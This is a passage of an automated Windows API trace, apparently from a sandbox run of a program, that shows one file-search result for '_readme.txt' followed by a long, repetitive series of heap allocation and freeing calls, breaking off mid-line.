ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.489] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.489] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.489] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.490] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.491] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.492] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.493] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.494] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.495] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.495] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) 